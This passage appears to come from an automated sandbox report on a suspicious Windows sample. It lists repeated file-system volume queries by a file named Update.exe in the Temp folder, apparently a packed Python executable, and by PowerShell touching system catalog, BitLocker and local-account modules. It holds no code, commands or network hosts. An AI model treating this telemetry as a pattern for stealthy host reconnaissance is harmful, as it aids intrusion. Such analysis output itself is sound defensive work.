            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57242 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57242 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57242\_hashlib.pyd VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57242\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI57242\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Update.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
